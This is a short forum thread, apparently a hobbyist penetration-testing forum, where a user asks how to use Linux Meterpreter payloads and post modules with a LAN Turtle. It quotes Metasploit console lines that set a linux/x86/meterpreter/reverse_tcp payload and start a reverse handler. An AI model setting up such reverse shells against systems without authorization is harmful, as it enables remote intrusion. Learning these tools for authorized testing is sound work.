Jump to content

[VIDEO] 103 - Metasploit and LAN Turtle with Meterpreter


Darren Kitchen

Recommended Posts

  • 2 weeks later...

Hi Darren

Quick question i see that you use the PHP payload is there any others we can use as i cant seam to use the post modules, with windows the payloads are not a problem but im getting a bit confused with the linux ones.

This is what im getting

msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > exploit -j [*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:2121 [*] Starting the payload handler...
msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495598 bytes) to MY EXTERNAL IP [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495598 bytes) to MY EXTERNAL IP [*] Transmitting intermediate stager for over-sized stage...(105 bytes)

and it just keeps going

If any of you guys could make a quick list that i can use with the Meterpreter and linux and also use the post modules that would be great.

Many Thanks

Regards

Raz0r

Edited by raz0r
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...